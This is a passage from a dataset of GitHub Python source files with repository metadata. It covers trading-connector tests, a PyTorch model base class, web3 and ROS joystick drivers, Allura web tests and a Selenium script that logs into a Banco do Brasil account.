amount=Decimal(\"1\"),\n creation_transaction_hash=\"someHash\",\n exchange_order_id=target_order_hash,\n )\n in_flight_order.order_fills[\"someHash\"] = None # to prevent order creation transaction request\n self.tracker.start_tracking_order(order=in_flight_order)\n in_flight_order.cancel_tx_hash = cancelation_transaction_hash\n self.injective_async_client_mock.configure_cancelation_transaction_stream_event(\n timestamp=self.initial_timestamp + 1,\n transaction_hash=cancelation_transaction_hash,\n order_hash=target_order_hash,\n )\n self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp + 1,\n order_hash=target_order_hash,\n state=\"canceled\",\n execution_type=\"limit\",\n order_type=in_flight_order.trade_type.name.lower(),\n price=in_flight_order.price,\n size=in_flight_order.amount,\n filled_size=Decimal(\"0\"),\n direction=in_flight_order.trade_type.name.lower(),\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n status_update = self.order_updates_logger.event_log[1]\n\n self.assertEqual(self.trading_pair, status_update.trading_pair)\n self.assertEqual(self.initial_timestamp + 1, status_update.update_timestamp)\n self.assertEqual(OrderState.CANCELED, status_update.new_state)\n self.assertEqual(in_flight_order.client_order_id, status_update.client_order_id)\n self.assertEqual(target_order_hash, status_update.exchange_order_id)\n","repo_name":"hummingbot/hummingbot","sub_path":"test/hummingbot/connector/gateway/clob_spot/data_sources/injective/test_injective_api_data_source.py","file_name":"test_injective_api_data_source.py","file_ext":"py","file_size_in_byte":41966,"program_lang":"python","lang":"en","doc_type":"code","stars":6520,"dataset":"github-code","pt":"34"} +{"seq_id":"37636183406","text":"import pandas as pd\nimport numpy as np\n\nData = pd.read_csv('Day4.txt', sep=',')\ndf = pd.DataFrame()\n\ndf['Pair1 start'] = Data.Pair1.str.split('-').str[0]\ndf['Pair1 end'] = Data.Pair1.str.split('-').str[1]\ndf['Pair2 start'] = Data.Pair2.str.split('-').str[0]\ndf['Pair2 end'] = Data.Pair2.str.split('-').str[1]\ndf = df.to_numpy(dtype=int)\n\ncount = np.zeros(len(df))\nfor n in range(0, len(df), 1):\n if df[n, 1] < df[n, 2]:\n count[n] = 1\n elif df[n, 3] < df[n, 0]:\n count[n] = 1\n\nprint(len(df)-np.sum(count))\n","repo_name":"supergermy/adventofcode_2022","sub_path":"SW/Day4/Day4.py","file_name":"Day4.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42921565468","text":"import numpy as np \nimport pandas as pd \nimport pprint as pp\n\ndef install_to_numeric(nparray):\n new_data = []\n for ele in nparray:\n value = \"\".join(ele[0][:-1].split(','))\n if value != None:\n new_data.append(int(value))\n else:\n new_data.append(np.nan)\n # return pd.DataFrame(nparray)\n return np.asarray(new_data)\n","repo_name":"Bojackxiang/advertisementReco","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16171694329","text":"import os\nfrom os.path import join\nimport imageio\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport time\n\n# -----------------------------------------------------------------------------\n\nclass BaseModel(nn.Module):\n\n def __init__(self, **kwargs):\n 
super(BaseModel, self).__init__()\n\n # ---- modules ----\n # by default, use \"model\" as the field name. you could of course customize.\n self.module_names = ['model']\n self.model = None # should be an instance of nn.Module\n\n def initialize(self, init_method='kaiming', model_path=None, verbose=False):\n \"\"\"initialize parameters by certain distribution\n Args:\n init_method: allowed: 'normal', 'xavier', 'kaiming', 'orthogonal', 'nothing'\n model_path: path to pretrained model\n verbose: if print out info\n \"\"\"\n from modules.module_utils import init_weights\n for name in self.module_names:\n init_weights(getattr(self, name), init_type=init_method, verbose=verbose)\n\n if model_path is not None and isinstance(model_path, str):\n self.load_special(model_path, verbose=verbose)\n\n def load_special(self, model_path, verbose=False):\n \"\"\"load model from pretrained model of not exactly this class\n i.e. you would need to copy some pretrained weights to this class\n - you may also decide specific method given your setting, e.g. self.architecture\n - always called if model_path is string\n \"\"\"\n\n pass\n\n def load(self, model_path, verbose=False):\n \"\"\"load model from pretrained model of exactly this class (often called manually)\n \"\"\"\n if verbose: print( \"initializing from pretrained model...\" )\n tic = time.time()\n\n try:\n state_dicts = torch.load(model_path)\n self.load_state_dict(state_dicts['model'], strict=False)\n if verbose: print( \"initialized model from pretrained %s (%.1f sec)\" % ( model_path, time.time()-tic ) )\n\n except:\n from modules.module_utils import copy_weights\n if model_path not in ['', None]:\n copy_weights(src_path=model_path, dst_net=self,\n keywords=None,\n name_maps=[\n lambda dst: dst,\n # lambda dst: 'sparse_point_net.' + dst.replace('densify_net.', '')\n ], verbose=True)\n if verbose: print( \"(SPECIAL) initialized model from pretrained %s (%.1f sec)\" % ( model_path, time.time()-tic ) )\n\n def save(self, model_dir, iter_num):\n raise NotImplementedError\n\n def parms(self):\n parms_list = []\n for name in self.module_names:\n parms_list += list(getattr(self, name).parameters())\n return parms_list\n\n def optimizable_parms(self):\n \"\"\" parameters to be optimized. 
Default: all parameters\n This function can be override by child-classes\n \"\"\"\n return self.parms()\n\n def named_parms(self):\n parms_dict = {}\n for name in self.module_names:\n parms_dict[name] = dict(getattr(self, name).named_parameters())\n return parms_dict\n\n def print(self, verbose=2):\n from utils.debug import print_network\n for name in self.module_names:\n print_network(getattr(self, name), verbose=verbose)\n\n def print_setting(self):\n # print out information as in **kwargs\n pass\n\n def forward(self, x):\n raise NotImplementedError(f\"forward function not yet specified\")\n","repo_name":"TimoBolkart/TEMPEH","sub_path":"models/model_aligner/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"34"} +{"seq_id":"70235034337","text":"import os\nimport json\n\nfrom web3 import Web3, HTTPProvider\nfrom web3.contract import ConciseContract\nfrom hexbytes.main import HexBytes\n\nclass SmartCheck():\n def __init__(self, contractList, network, tx_hash):\n compiled_sol = os.path.join('./build', contractList['SmartCheck'][2:].replace('.sol', '.json'))\n with open(compiled_sol, 'r') as f:\n contract_interface = json.load(f)\n\n # web3.py instance\n w3 = Web3(Web3.HTTPProvider(network))\n\n # Get tx receipt to get contract address\n tx_Hash = HexBytes(tx_hash)\n tx_receipt = w3.eth.getTransactionReceipt(tx_Hash)\n contract_address = tx_receipt['contractAddress']\n\n # Contract instance in concise mode\n abi = contract_interface['abi']\n contract_instance = w3.eth.contract(address=contract_address, abi=abi, ContractFactoryClass=ConciseContract)\n\n self.w3 = w3\n self.contract_instance = contract_instance\n\n def _createStudent(self, studId, age, fName, lName):\n self.contract_instance.createStudent(studId, age, fName, lName, transact={'from': self.w3.eth.accounts[0]})\n\n def _getParticularStudent(self, studId):\n _fName, _lName, _age, _attendanceValue = self.contract_instance.getParticularStudent(studId)\n return {\n \"fName\": _fName.decode('utf-8'),\n \"lName\": _lName.decode('utf-8'),\n \"age\": _age,\n \"attendanceValue\": _attendanceValue,\n }\n\n def _getStudents(self):\n return { \"studIdList\": self.contract_instance.getStudents() }","repo_name":"yunsu246/smart-check","sub_path":"backend/app/api/SmartCheck.py","file_name":"SmartCheck.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9849419612","text":"import csv\nimport json\nimport os,sys\n\ndef makejson(csvfilepath):\n\tdata={}\n\t\n\n\twith open(csvfilepath,encoding='utf-8') as csvf:\n\t\t\n\t\tcsvreader=csv.DictReader(csvf)\n\t\tfor index,row in 
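# --- Editor's aside (illustrative, not a dataset record): the SmartCheck
# record above decodes bytes fields returned from a contract call with
# .decode('utf-8'); fixed-width bytes fields are often NUL-padded, so stripping
# the padding first avoids embedded \x00 in the result. Plain-Python sketch of
# that decode step, no node required:
raw_name = b"Alice\x00\x00\x00"          # what a padded bytes field can look like
assert raw_name.rstrip(b"\x00").decode("utf-8") == "Alice"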
enumerate(csvreader):\n\t\t\tcondition=row[\"condition\"]\n\t\t\tcondition_cui=row[\"condition_cui\"]\n\t\t\tif(index==0):\n\t\t\t\tdata[condition]={}\n\t\t\t\tdata[condition][\"cui\"]=condition_cui\n\t\t\t\tdata[condition][\"have_had\"]={}\n\t\t\t\tdata[condition][\"looking_for\"]={}\n\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]]={}\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"cui\"]=row[\"label_cui\"]\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"score\"]=row[\"label_score\"]\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"label_semantic_types\"]=row[\"label_semantic_types\"]\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"label_ncts_counts\"]=row[\"label_ncts_count\"]\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"ncts\"]=row[\"label_ncts\"]\n\twith open(\"combined.json\",'w') as js:\n\t\tjs.write(json.dumps(data,sort_keys=True,indent=4))\n\t\n\treturn \n\n\ndef makecsv(jfilepath):\n\tjsonfile=open(jfilepath,'r')\n\tjsondata = json.load(jsonfile)\n\tedata = open('1.csv', 'w')\n\tcsvwriter = csv.writer(edata)\n\tdata=[]\n\tcsvwriter.writerow([\"condition\",\"condition_cui\",\"label\",\n\t\t\t\"label_cui\",\"label_score\",\"label_semantic_types\",\n\t\t\t\"label_ncts\",\"label_bucket\",\"label_ncts_count\"])\n\tfor k,v in jsondata.items():\n\t\tfor y,x in jsondata[k][\"have_had\"].items():\n\t\t\tdata.append([k,v[\"cui\"],y,jsondata[k][\"have_had\"][y][\"cui\"],\n\t\t\t\tjsondata[k][\"have_had\"][y][\"score\"],\n\t\t\t\tjsondata[k][\"have_had\"][y][\"label_semantic_types\"],\n\t\t\t\tjsondata[k][\"have_had\"][y][\"label_ncts_counts\"],\n\t\t\t\t\"have_had\",\n\t\t\t\tjsondata[k][\"have_had\"][y][\"ncts\"]])\n\n\t\tfor y,x in jsondata[k][\"looking_for\"].items():\n\t\t\tdata.append([k,v[\"cui\"],y,jsondata[k][\"looking_for\"][y][\"cui\"],\n\t\t\t\tjsondata[k][\"looking_for\"][y][\"score\"],\n\t\t\t\tjsondata[k][\"looking_for\"][y][\"label_semantic_types\"],\n\t\t\t\tjsondata[k][\"looking_for\"][y][\"label_ncts_counts\"],\n\t\t\t\t\"looking_for\",\n\t\t\t\tjsondata[k][\"looking_for\"][y][\"ncts\"]])\n\tfor x in data:\n\t\tcsvwriter.writerow(x)\n\tedata.close()\n\n\treturn \n\n\nfile_namescsv=sys.argv[1]\nfile_namesjson=sys.argv[2]\n\nmakejson(file_namescsv)\n\nmakecsv(file_namesjson)\n\n","repo_name":"ayazwani/fileconversions-data-","sub_path":"cmd2.py","file_name":"cmd2.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72659824099","text":"import mock\nimport tg\nfrom nose.tools import assert_equal, assert_in, assert_not_in\n\nfrom alluratest.controller import TestRestApiBase\nfrom allura.model import Project, User\nfrom allura.tests import decorators as td\nfrom allura.tests import TestController\n\n\nclass TestUserProfile(TestController):\n\n @td.with_user_project('test-admin')\n def test_profile(self):\n r = self.app.get('/u/test-admin/profile/')\n assert_equal('Test Admin',\n r.html.find('h1', 'project_title').find('a').text)\n sections = set([c for s in r.html.findAll(None, 'profile-section') for c in s['class'].split()])\n assert_in('personal-data', sections)\n assert_in('Username:test-admin', r.html.find(None, 'personal-data').getText())\n assert_in('projects', sections)\n assert_in('Test Project', r.html.find(None, 'projects').getText())\n assert_in('Last Updated:less than 1 minute ago', r.html.find(None, 'projects').getText())\n assert_in('tools', sections)\n 
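# --- Editor's aside (not a dataset record): makejson in the record above only
# builds the per-condition dict when index == 0, so a CSV containing a second
# condition would raise KeyError; dict.setdefault keeps the same nesting while
# initializing every condition it meets. A trimmed, hedged sketch:
import csv

def rows_to_nested(path):
    data = {}
    with open(path, encoding="utf-8") as f:
        for row in csv.DictReader(f):
            cond = data.setdefault(row["condition"], {
                "cui": row["condition_cui"], "have_had": {}, "looking_for": {}})
            cond[row["label_bucket"]][row["label"]] = {"cui": row["label_cui"]}
    return data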
assert_in('Admin', r.html.find(None, 'tools').getText())\n assert_in('skills', sections)\n assert_in('No skills entered', r.html.find(None, 'skills').getText())\n\n def test_wrong_profile(self):\n self.app.get('/u/no-such-user/profile/', status=404)\n\n @td.with_user_project('test-user')\n def test_missing_user(self):\n User.query.remove(dict(username='test-user'))\n p = Project.query.get(shortname='u/test-user')\n assert p is not None and p.is_user_project\n response = self.app.get('/u/test-user/profile/', status=404)\n\n def test_differing_profile_proj_shortname(self):\n User.upsert('foo_bar')\n\n # default auth provider's user_project_shortname() converts _ to - for the project name\n response = self.app.get('/u/foo_bar/profile/', status=302)\n assert_equal(response.location, 'http://localhost/u/foo-bar/')\n\n # unfortunately this doesn't work because the default auth provider's user_by_project_shortname()\n # doesn't try converting back (and it probably shouldn't since you could get multiple users with conflicting proj names)\n # at least this works with other auth providers that have a more complete implementation of both\n # user_project_shortname() and user_by_project_shortname()\n #self.app.get('/u/foo-bar/profile/')\n\n @td.with_user_project('test-admin')\n @td.with_wiki\n def test_feed(self):\n for ext in ['', '.rss', '.atom']:\n r = self.app.get('/u/test-admin/profile/feed%s' % ext, status=200)\n assert 'Recent posts by Test Admin' in r\n assert 'Home modified by Test Admin' in r\n\n @td.with_user_project('test-admin')\n @td.with_user_project('test-user')\n @mock.patch('allura.tasks.mail_tasks.sendsimplemail')\n @mock.patch('allura.lib.helpers.gen_message_id')\n @mock.patch('allura.model.User.can_send_user_message')\n def test_send_message(self, check, gen_message_id, sendsimplemail):\n check.return_value = True\n gen_message_id.return_value = 'id'\n test_user = User.by_username('test-user')\n test_user.set_pref('email_address', 'test-user@example.com')\n response = self.app.get(\n '/u/test-user/profile/send_message', status=200)\n assert 'From: "Test Admin" <test-admin@users.localhost>' in response\n self.app.post('/u/test-user/profile/send_user_message',\n params={'subject': 'test subject',\n 'message': 'test message',\n 'cc': 'on'})\n\n sendsimplemail.post.assert_called_once_with(\n cc=User.by_username('test-admin').get_pref('email_address'),\n text=u'test message\\n\\n---\\n\\nThis message was sent to you via the Allura web mail form. You may reply to this message directly, or send a message to Test Admin at http://localhost:8080/u/test-admin/profile/send_message\\n',\n toaddr=User.by_username('test-user').get_pref('email_address'),\n fromaddr=User.by_username('test-admin').get_pref('email_address'),\n reply_to=User.by_username('test-admin').get_pref('email_address'),\n message_id=u'id',\n subject=u'test subject')\n sendsimplemail.reset_mock()\n self.app.post('/u/test-user/profile/send_user_message',\n params={'subject': 'test subject',\n 'message': 'test message'})\n\n sendsimplemail.post.assert_called_once_with(\n cc=None,\n text=u'test message\\n\\n---\\n\\nThis message was sent to you via the Allura web mail form. 
You may reply to this message directly, or send a message to Test Admin at http://localhost:8080/u/test-admin/profile/send_message\\n',\n toaddr=User.by_username('test-user').get_pref('email_address'),\n fromaddr=User.by_username('test-admin').get_pref('email_address'),\n reply_to=User.by_username('test-admin').get_pref('email_address'),\n message_id=u'id',\n subject=u'test subject')\n\n check.return_value = False\n response = self.app.get(\n '/u/test-user/profile/send_message', status=200)\n assert 'Sorry, messaging is rate-limited' in response\n\n @td.with_user_project('test-user')\n def test_send_message_for_anonymous(self):\n r = self.app.get('/u/test-user/profile/send_message',\n extra_environ={'username': '*anonymous'},\n status=302)\n assert 'You must be logged in to send user messages.' in self.webflash(\n r)\n\n r = self.app.post('/u/test-user/profile/send_user_message',\n params={'subject': 'test subject',\n 'message': 'test message',\n 'cc': 'on'},\n extra_environ={'username': '*anonymous'},\n status=302)\n assert 'You must be logged in to send user messages.' in self.webflash(\n r)\n\n @td.with_user_project('test-user')\n def test_link_to_send_message_form(self):\n User.by_username('test-admin').set_pref('email_address',\n 'admin@example.com')\n User.by_username('test-user').set_pref('email_address',\n 'user@example.com')\n r = self.app.get('/u/test-user/profile',\n status=200)\n assert r.html.find('a', dict(href='send_message'))\n\n @td.with_user_project('test-user')\n def test_disable_user_messages(self):\n User.by_username('test-admin').set_pref('email_address',\n 'admin@example.com')\n test_user = User.by_username('test-user')\n test_user.set_pref('email_address', 'user@example.com')\n test_user.set_pref('disable_user_messages', True)\n r = self.app.get('/u/test-user/profile')\n assert 'Send me a message' not in r\n r = self.app.get('/u/test-user/profile/send_message', status=302)\n assert 'This user has disabled direct email messages' in self.webflash(\n r)\n\n @td.with_user_project('test-user')\n def test_profile_sections(self):\n project = Project.query.get(shortname='u/test-user')\n app = project.app_instance('profile')\n\n def ep(n):\n m = mock.Mock()\n m.name = n\n m.load()().display.return_value = 'Section %s' % n\n return m\n eps = map(ep, ['a', 'b', 'c', 'd'])\n order = {'user_profile_sections.order': 'b, d,c , f '}\n if hasattr(type(app), '_sections'):\n delattr(type(app), '_sections')\n with mock.patch('allura.lib.helpers.iter_entry_points') as iep:\n with mock.patch.dict(tg.config, order):\n iep.return_value = eps\n sections = app.profile_sections\n assert_equal(sections, [\n eps[1].load(),\n eps[3].load(),\n eps[2].load(),\n eps[0].load()])\n r = self.app.get('/u/test-user/profile')\n assert_in('Section a', r.body)\n assert_in('Section b', r.body)\n assert_in('Section c', r.body)\n assert_in('Section d', r.body)\n assert_not_in('Section f', r.body)\n\n\nclass TestUserProfileHasAccessAPI(TestRestApiBase):\n\n @td.with_user_project('test-admin')\n def test_has_access_no_params(self):\n self.api_get('/rest/u/test-admin/profile/has_access', status=404)\n self.api_get('/rest/u/test-admin/profile/has_access?user=root', status=404)\n self.api_get('/rest/u/test-admin/profile/has_access?perm=read', status=404)\n\n @td.with_user_project('test-admin')\n def test_has_access_unknown_params(self):\n \"\"\"Unknown user and/or permission always False for has_access API\"\"\"\n r = self.api_get(\n '/rest/u/test-admin/profile/has_access?user=babadook&perm=read',\n user='root')\n 
assert_equal(r.status_int, 200)\n assert_equal(r.json['result'], False)\n r = self.api_get(\n '/rest/u/test-admin/profile/has_access?user=test-user&perm=jump',\n user='root')\n assert_equal(r.status_int, 200)\n assert_equal(r.json['result'], False)\n\n @td.with_user_project('test-admin')\n def test_has_access_not_admin(self):\n \"\"\"\n User which has no 'admin' permission on neighborhood can't use\n has_access API\n \"\"\"\n self.api_get(\n '/rest/u/test-admin/profile/has_access?user=test-admin&perm=admin',\n user='test-user',\n status=403)\n\n @td.with_user_project('test-admin')\n def test_has_access(self):\n r = self.api_get(\n '/rest/u/test-admin/profile/has_access?user=test-admin&perm=admin',\n user='root')\n assert_equal(r.status_int, 200)\n assert_equal(r.json['result'], True)\n r = self.api_get(\n '/rest/u/test-admin/profile/has_access?user=test-user&perm=admin',\n user='root')\n assert_equal(r.status_int, 200)\n assert_equal(r.json['result'], False)\n","repo_name":"lym/allura-git","sub_path":"Allura/allura/tests/functional/test_user_profile.py","file_name":"test_user_profile.py","file_ext":"py","file_size_in_byte":10257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"32342804183","text":"from dataclasses import dataclass\nfrom threading import Lock, Thread\nfrom typing import List\nfrom construct import Container\nfrom time import sleep, time\nfrom sensor_msgs.msg import Joy\nfrom .joy_publisher import JoyPublisher\nfrom serial import Serial\nfrom crsf_parser import CRSFParser, PacketsTypes, PacketValidationStatus\nimport rospy\n\n\n@dataclass\nclass CRSFConfiguration:\n \"\"\"\n CRSF driver configuration\n \"\"\"\n\n axis_map: List[int]\n buttons_map: List[int]\n serial_port: str\n serial_baudrate: int\n joy_message_rate: float\n failsafe_timeout: float\n failsafe_axis: List[float]\n failsafe_buttons: List[float]\n deadband: float\n\n def __repr__(self) -> str:\n ret = f\"\"\"configuration:\n axis_map:{self.axis_map}\n buttons_map:{self.buttons_map}\n serial: {self.serial_port} @ {self.serial_baudrate}\n joy message rate: {self.joy_message_rate}\n failsafe: timeout {self.failsafe_timeout}, axis[{self.failsafe_axis}] , buttons [{self.failsafe_buttons}]\n deadband: {self.deadband}\n \"\"\"\n return ret\n\n\nclass CRSFDrv:\n \"\"\"\n CRSF Joy Driver implementaton\n \"\"\"\n\n def __init__(self, config: CRSFConfiguration, publisher: rospy.Publisher) -> None:\n\n self._config = config\n self._message_pub = publisher\n self._joy_publisher = JoyPublisher(\n self._config.axis_map, self._config.buttons_map, self._message_pub\n )\n\n self._values_lock = Lock()\n self._last_values = None\n self._last_update_time: float = 0\n self._is_running = True\n\n self._crsf_parser = CRSFParser(self.publish)\n\n self._publishing_thread = Thread(target=self._publishing_worker)\n\n def _set_failsafe(self) -> None:\n self._joy_publisher.publish(\n self._config.failsafe_axis, self._config.failsafe_buttons\n )\n\n def _publishing_worker(self) -> None:\n try:\n previous_update = 0\n while self._is_running:\n with self._values_lock:\n time_since_last_update = time() - self._last_update_time\n if time_since_last_update > self._config.failsafe_timeout:\n self._set_failsafe()\n else:\n if previous_update != self._last_update_time:\n previous_update = self._last_update_time\n self._joy_publisher.remap_and_publish(self._last_values)\n sleep(1.0 / self._config.joy_message_rate)\n finally:\n self._set_failsafe()\n self._is_running = False\n\n def 
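# --- Editor's aside (illustrative, not a dataset record): the stacked
# mock.patch decorators in the Allura test above inject mocks bottom-up, so the
# innermost patch becomes the first test argument (which is why `check` binds
# to User.can_send_user_message). A self-contained demo of that ordering:
from unittest import mock

@mock.patch("os.getcwd")   # outermost patch -> last extra argument
@mock.patch("os.getpid")   # innermost patch -> first extra argument
def demo(getpid_mock, getcwd_mock):
    return getpid_mock, getcwd_mock

first, last = demo()
assert first is not last   # two distinct MagicMock objects, in bottom-up order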
adjust_channel(self, value: float) -> float:\n value = value if abs(value) > self._config.deadband else 0\n value = max(-1.0, min(1.0, value))\n return value\n\n def publish(self, packet: Container, status: PacketValidationStatus) -> None:\n if status == PacketValidationStatus.VALID:\n if packet.header.type == PacketsTypes.RC_CHANNELS_PACKED:\n with self._values_lock:\n # derived from CRSF spec Rev7, TICKS_TO_US(x) = ((x - 992) * 5 / 8 + 1500)\n channels = [\n ((x - 992) * 10 / 8000) for x in packet.payload.channels\n ]\n channels = [self.adjust_channel(x) for x in channels]\n # Inversion is a temporary workaround as the parser return them reversed\n self._last_values = channels[::-1]\n self._last_update_time = time()\n else:\n rospy.logwarn_throttle(\n 5, f\"received invalid data with status {status}, {packet}\"\n )\n\n def run(self) -> None:\n with Serial(\n self._config.serial_port, self._config.serial_baudrate, timeout=2\n ) as ser:\n input_data = bytearray()\n self._is_running = True\n self._publishing_thread.start()\n while not rospy.is_shutdown():\n values = ser.read(100)\n input_data.extend(values)\n self._crsf_parser.parse_stream(input_data)\n\n self._is_running = False\n self._publishing_thread.join()\n","repo_name":"AlessioMorale/ros_crsf_driver","sub_path":"crsf_drv/crsf_drv.py","file_name":"crsf_drv.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"37293302640","text":"#coding=utf-8\n\nfrom builtins import str\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nfrom basie.procedures import Procedure, PROC_PREFIX\n\nclass TestProcedures(unittest.TestCase):\n def setUp(self):\n self.simple_procedure = Procedure(\"SIMPLE\", 0, \"\\tnop\\n\")\n self.simple_procedure_two = Procedure(\"SIMPLE_TWO\", 0, \"\\tnop_two\\n\")\n self.one_param_procedure = Procedure(\"ONE_PARAM\", 1, \"\\tparam=$1\\n\",\n True)\n\n def test_simple_procedure_definition(self):\n self.assertEqual(str(self.simple_procedure),\n \"%sSIMPLE{\\n\\tnop\\n}\\n\" % (PROC_PREFIX,))\n self.assertEqual(self.simple_procedure.execute(),\n \"%sSIMPLE\" % (PROC_PREFIX,))\n\n def test_simple_procedure_sum(self):\n sum_procedure = self.simple_procedure + self.simple_procedure_two\n self.assertEqual(str(sum_procedure),\n \"%sSIMPLE_SIMPLE_TWO{\\n\\tnop\\n\\tnop_two\\n}\\n\" %\n (PROC_PREFIX,))\n self.assertEqual(sum_procedure.execute(),\n \"%sSIMPLE_SIMPLE_TWO\" % (PROC_PREFIX,))\n\n def test_one_param_procedure_definition(self):\n self.assertEqual(str(self.one_param_procedure),\n \"%sONE_PARAM(1){\\n\\tparam=$1\\n}\\n\" % (PROC_PREFIX,))\n\n def test_one_param_procedure_execution(self):\n one_param = self.one_param_procedure(\"test\")\n self.assertEqual(str(one_param),\n \"%sONE_PARAM(1){\\n\\tparam=$1\\n}\\n\" % (PROC_PREFIX,))\n self.assertEqual(one_param.execute(),\n \"%sONE_PARAM=test\" % (PROC_PREFIX,))\n\n def test_sum_simple_one_param_definition(self):\n sum_procedure = self.simple_procedure + self.one_param_procedure\n self.assertEqual(str(sum_procedure),\n \"%sSIMPLE_ONE_PARAM(1){\\n\\tnop\\n\\tparam=$1\\n}\\n\" %\n (PROC_PREFIX,))\n\n def test_sum_simple_one_param_execution(self):\n # i want this to work eventually\n #sum_procedure = self.simple_procedure + \\\n # self.one_param_procedure(\"test\")\n sum_procedure = (self.simple_procedure + \\\n self.one_param_procedure)(\"test\")\n self.assertEqual(str(sum_procedure),\n \"%sSIMPLE_ONE_PARAM(1){\\n\\tnop\\n\\tparam=$1\\n}\\n\" %\n 
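# --- Editor's aside (not a dataset record): the CRSF driver above rescales
# packed RC ticks with ((x - 992) * 10 / 8000), i.e. (x - 992) / 800, so 992
# maps to center and +/-800 ticks hit the clamp limits used by adjust_channel.
# Spot-checking that arithmetic:
def ticks_to_unit(x):
    return (x - 992) * 10 / 8000

assert ticks_to_unit(992) == 0.0
assert ticks_to_unit(1792) == 1.0 and ticks_to_unit(192) == -1.0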
(PROC_PREFIX,))\n self.assertEqual(sum_procedure.execute(),\n \"%sSIMPLE_ONE_PARAM=test\" % (PROC_PREFIX,))\n\n\n","repo_name":"discos/basie","sub_path":"test/test_procedures.py","file_name":"test_procedures.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34071478918","text":"\"\"\"Login na página do Banco do Brasil.\"\"\"\n\nimport time\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\ndef login_banco(driver, agencia=None, conta=None, senha=None):\n \"\"\"Login na página do Banco do Brasil.\n\n A página já deve estar na página de acesso à conta.\n @param driver: driver da página Selenium\n @param agencia: número da agencia (com DV, sem traço)\n @param conta: número da conta (com DV, sem traço)\n @param senha: senha da conta. Caso vazia, a senha será inserida manualmente\n \"\"\"\n wdw = WebDriverWait(driver, 20)\n\n # agencia e conta\n if agencia is None or conta is None:\n print('Insira a agência e conta.')\n locator = (By.ID, 'senhaConta')\n WebDriverWait(driver, 120).until(\n ec.presence_of_element_located(locator),\n message='Encerrado: ag/conta não add.')\n\n else:\n\n # Navega para a página de login\n locator = (By.XPATH, '//*[@id=\"header\"]/header/bb-navbar-header/nav/div[2]/div[2]/bb-navbar-dropdown')\n tag = wdw.until(ec.presence_of_element_located(locator))\n driver.execute_script('arguments[0].click();', tag)\n\n locator = (By.XPATH, '//*[@id=\"cdk-overlay-0\"]/bb-dropdown-menu/bb-menu/ul/li[1]/a')\n tag = wdw.until(ec.presence_of_element_located(locator))\n driver.execute_script('arguments[0].click();', tag)\n \n # insere agencia e conta\n locator = (By.ID, 'dependenciaOrigem')\n dob = wdw.until(ec.presence_of_element_located(locator))\n for _ in range(0, 10):\n dob.send_keys(Keys.BACKSPACE)\n dob.send_keys(f'{agencia}')\n\n locator = (By.ID, 'numeroContratoOrigem')\n dob = driver.find_element(*locator)\n for _ in range(0, 10):\n dob.send_keys(Keys.BACKSPACE)\n dob.send_keys(f'{conta}')\n\n # envia os dados e vai para pagina de senha\n locator = (By.ID, 'botaoEnviar')\n driver.find_element(*locator).click()\n\n time.sleep(2) # troca de tela\n\n # senha\n if senha is None:\n print('Insira a senha da conta.')\n\n else:\n locator = (By.ID, 'senhaConta')\n dob = wdw.until(ec.presence_of_element_located(locator))\n for _ in range(0, 10):\n dob.send_keys(Keys.BACKSPACE)\n dob.send_keys(f'{senha}')\n\n locator = (By.ID, 'botaoEnviar')\n driver.find_element(*locator).click()\n\n # Tenta encontrar os titulares\n try:\n locator = (By.ID, 'dialogContent_0')\n wdw.until(\n ec.presence_of_element_located(locator))\n\n box = driver.find_element(*locator)\n box_tags = box.find_elements(By.TAG_NAME, 'a')\n box_tags[0].click()\n\n except:\n pass\n\n # espera a página carregar\n locator = (By.XPATH, '//a[@title=\"Minha página\"]')\n wdw.until(\n ec.presence_of_element_located(locator),\n message='Encerrado: página inicial não foi carregada.')\n\n time.sleep(2) # troca de tela\n","repo_name":"vinimaciel01-code/bbscrap","sub_path":"bbscrap/navegacao/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6852781042","text":"\"\"\"\nThis file makes the following benchmarking datasets:\n - 
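# --- Editor's aside (illustrative, not a dataset record): the Banco do Brasil
# login above repeats the locator/WebDriverWait/presence pattern many times; a
# small helper in the same spirit keeps each step to one call. Sketch only:
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait

def wait_for(driver, locator, timeout=20, message=""):
    return WebDriverWait(driver, timeout).until(
        ec.presence_of_element_located(locator), message=message)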
